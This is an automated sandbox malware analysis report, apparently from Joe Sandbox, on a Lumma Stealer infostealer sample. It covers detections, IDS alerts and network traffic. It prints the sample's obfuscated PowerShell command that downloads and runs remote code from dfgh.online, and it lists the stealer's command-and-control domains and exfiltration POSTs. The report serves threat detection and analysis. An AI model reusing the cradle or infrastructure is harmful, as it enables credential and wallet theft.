Windows Analysis Report
Active_Setup.exe

Overview

General Information

Sample name: Active_Setup.exe
Analysis ID: 1582495
MD5: b106a3a66916985d5e5b6cbbb6c5b07c
SHA1: 91ac93059958c0267bd8a909ed83284fdc8e4c7d
SHA256: 195f6445fe4cc70d48c65e973008336c82a0455163e51152c05f2b4ce32963f5
Tags: exe, LummaStealer, user-aachum

Detection

LummaC
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking mutex)
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (may stop execution after checking a module file name)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Searches for user specific document files
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: PowerShell Web Download
Sigma detected: Usage Of Web Request Commands And Cmdlets
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Active_Setup.exe (PID: 7532 cmdline: "C:\Users\user\Desktop\Active_Setup.exe" MD5: B106A3A66916985D5E5B6CBBB6C5B07C)
    • powershell.exe (PID: 7956 cmdline: powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ; MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7964 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Blogpost URLs: (none listed)
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["noisycuttej.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop", "nearycrepso.shop", "cryofficesj.click", "abruptyopsn.shop"], "Build id": "hRjzG3--ZINA"}
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security |
sslproxydump.pcap | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

Source | Rule | Description | Author | Strings
00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | Windows_Trojan_Donutloader_f40e3759 | unknown | unknown | 0x4d063:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000003.1860274897.0000000000BD4000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Active_Setup.exe PID: 7532 | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security |
Process Memory Space: Active_Setup.exe PID: 7532 | JoeSecurity_LummaCStealer | Yara detected LummaC Stealer | Joe Security |
decrypted.memstr | JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |

              System Summary

Sigma rule matches (six rules, all matching the same process-start event):
  • Source: Process started; Author: Florian Roth (Nextron Systems)
  • Source: Process started; Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix)
  • Source: Process started; Author: frack113
  • Source: Process started; Author: Florian Roth (Nextron Systems)
  • Source: Process started; Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger
  • Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements)

Event data (identical for all six matches):
  Command (also reported as CommandLine and ProcessCommandLine, all identical): powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; ;
  CommandLine|base64offset|contains: ^
  Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  ParentCommandLine: "C:\Users\user\Desktop\Active_Setup.exe"
  ParentImage: C:\Users\user\Desktop\Active_Setup.exe
  ParentProcessId: 7532
  ParentProcessName: Active_Setup.exe
  ProcessId: 7956
  ProcessName: powershell.exe
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-30T18:19:11.591616+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:12.741413+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:13.996351+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49732 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:15.154663+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49733 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:16.620362+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49734 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:19.923859+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49737 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:20.992784+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:23.166550+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49743 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:25.275090+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:26.632901+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49745 | 185.161.251.21 | 443 | TCP
2024-12-30T18:19:27.076691+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.4 | 49746 | 104.21.37.128 | 443 | TCP
2024-12-30T18:19:12.261155+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:13.229866+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:25.778758+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.4 | 49744 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:12.261155+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.4 | 49730 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:13.229866+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.4 | 49731 | 188.114.97.3 | 443 | TCP
2024-12-30T18:19:22.172959+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49740 | 188.114.97.3 | 443 | TCP

              AV Detection

Source: https://cegu.shop/ | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtn8J | Avira URL Cloud: Label: malware
Source: https://dfgh.online | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/ | Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compname= | Avira URL Cloud: Label: malware
Source: https://dfgh.online/ | Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=user-PC | Avira URL Cloud: Label: malware
Source: https://dfgh.online/invoker.php?compName=user-PCt | Avira URL Cloud: Label: malware
Source: https://klipvumisui.shop/int_clp_sha.txtG3 | Avira URL Cloud: Label: malware
Source: Active_Setup.exe.7532.0.memstrmin | Malware Configuration Extractor: LummaC {"C2 url": ["noisycuttej.shop", "wholersorie.shop", "framekgirus.shop", "tirepublicerj.shop", "rabidcowse.shop", "cloudewahsj.shop", "nearycrepso.shop", "cryofficesj.click", "abruptyopsn.shop"], "Build id": "hRjzG3--ZINA"}
Source: Active_Setup.exe | ReversingLabs: Detection: 18%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.7% probability
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cloudewahsj.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: rabidcowse.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: noisycuttej.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: tirepublicerj.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: framekgirus.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: wholersorie.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: abruptyopsn.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: nearycrepso.shop
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: cryofficesj.click
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: Workgroup: -
Source: 00000000.00000002.1933935551.0000000000940000.00000040.00001000.00020000.00000000.sdmp | String decryptor: hRjzG3--ZINA
Source: Active_Setup.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49731 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49733 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49743 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.4:49744 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.4:49745 version: TLS 1.2
Source: Active_Setup.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000004.00000002.1940316473.0000000002CB9000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: \??\C:\Windows\dll\Microsoft.PowerShell.Commands.Utility.pdbes source: powershell.exe, 00000004.00000002.1944489969.00000000072B0000.00000004.00000020.00020000.00000000.sdmp
              Source: Binary string: E:\AWork\DRW15.8AB3\sharelib\EuDownloadPublicLibrary\x86\exe\EuDownload.pdb source: Active_Setup.exe
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_01084079 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose | 0_2_01084079
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 0_2_01083B05 __getdrive,FindFirstFileA,__wfullpath_helper,_strlen,_IsRootUNCName,GetDriveTypeA,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FileTimeToLocalFileTime,FileTimeToSystemTime,___loctotime64_t,FindClose,___dtoxmode,GetLastError,__dosmaperr,FindClose | 0_2_01083B05
Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\PlaceholderTileLogoFolder
Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\Comms
Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\Packages
Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local
Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\Mozilla
Source: C:\Users\user\Desktop\Active_Setup.exe | File opened: C:\Users\user\AppData\Local\PeerDistRepub
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h | 0_2_0095E045
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov esi, ecx | 0_2_0095E045
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+4992E1F9h] | 0_2_0096C11C
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_00958292
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx edi, byte ptr [ecx+esi] | 0_2_009442E6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h | 0_2_00980246
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then jmp dword ptr [0044664Ch] | 0_2_0096838E
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax+18h] | 0_2_0095C3FD
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov dword ptr [esp+04h], eax | 0_2_009586F3
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax] | 0_2_0097C616
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov byte ptr [edi], bl | 0_2_0094A616
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], 798ECF08h | 0_2_0095A646
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [esp+ecx-000000CFh] | 0_2_0095A646
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+00000084h] | 0_2_0095A646
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx edi, byte ptr [esp+eax+0Ch] | 0_2_0095A646
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 0_2_0095A646
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov byte ptr [esi], al | 0_2_0095C89B
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [edi] | 0_2_0094A886
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov edx, ecx | 0_2_0094E8D6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov word ptr [ecx], dx | 0_2_0096487E
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ebx, dword ptr [edi+04h] | 0_2_0096A9B6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h] | 0_2_00948AA6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx ecx, word ptr [edi+esi*4] | 0_2_00948AA6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov edx, dword ptr [ebp-18h] | 0_2_0097EA13
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx ebx, byte ptr [edx] | 0_2_00976A26
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h | 0_2_00958B87
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_00968BF0
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp byte ptr [ecx+eax+01h], 00000000h | 0_2_00968D9A
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp word ptr [esi+eax+02h], 0000h | 0_2_0095CDF9
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h | 0_2_0096AF76
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_009630B6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx edx, byte ptr [esp+eax+12h] | 0_2_0096907D
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [esi+edx*8], EACC7C31h | 0_2_009591D2
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, ebx | 0_2_009552DE
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov dword ptr [esp], edx | 0_2_009793D6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp byte ptr [eax+edi+09h], 00000000h | 0_2_009793D6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp word ptr [ebp+esi+02h], 0000h | 0_2_0096934F
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_0096D4A0
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_0096D4D4
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ah, dl | 0_2_0094F4C7
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [edx+ecx*8], 0827F28Dh | 0_2_00955509
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_0096D44A
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_00967796
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx esi, byte ptr [esp+eax-33h] | 0_2_009677B6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx edi, byte ptr [ebx] | 0_2_0096B7D6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 0_2_00955767
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+esi*8], 385488F2h | 0_2_00955767
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ebx, ecx | 0_2_0095F836
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then movzx ecx, byte ptr [esp+eax+28h] | 0_2_0095984E
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov byte ptr [eax], dl | 0_2_00963B1C
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov word ptr [eax], cx | 0_2_0095DC88
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ebx, eax | 0_2_0094DC8B
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [ebp+ebx*8+00h], 4B1BF3DAh | 0_2_00979D5A
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_0095BEF6
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then mov ecx, eax | 0_2_00969E36
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [edi+ebx*8], 6E87DD67h | 0_2_00979F46
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp dword ptr [edx+edi*8], 31E2A9F4h | 0_2_00979F46
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then test eax, eax | 0_2_00979F46
Source: C:\Users\user\Desktop\Active_Setup.exe | Code function: 4x nop then cmp edx, esi | 0_2_00979F46

Networking

Source: Network traffic | Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Malware configuration extractor | URLs: noisycuttej.shop
Source: Malware configuration extractor | URLs: wholersorie.shop
Source: Malware configuration extractor | URLs: framekgirus.shop
Source: Malware configuration extractor | URLs: tirepublicerj.shop
Source: Malware configuration extractor | URLs: rabidcowse.shop
Source: Malware configuration extractor | URLs: cloudewahsj.shop
Source: Malware configuration extractor | URLs: nearycrepso.shop
Source: Malware configuration extractor | URLs: cryofficesj.click
Source: Malware configuration extractor | URLs: abruptyopsn.shop
Source: Joe Sandbox View | IP Address: 188.114.97.3
Source: Joe Sandbox View | IP Address: 185.161.251.21
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49740 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49737 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49733 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49745 -> 185.161.251.21:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49746 -> 104.21.37.128:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49731 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49744 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49743 -> 188.114.97.3:443
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: application/x-www-form-urlencoded | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 78 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=UPKT1BAEQ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 18108 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=7QUBYJNPHNLVMQ | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 8759 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=VRN1V18XB5 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 20388 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=1TU6Q0GRH | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 5423 | Host: cryofficesj.click
Source: global traffic | HTTP traffic detected: POST /api HTTP/1.1 | Connection: Keep-Alive | Content-Type: multipart/form-data; boundary=9GG5ZRYHRIWU2KO84LR | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 | Content-Length: 1262 | Host: cryofficesj.click
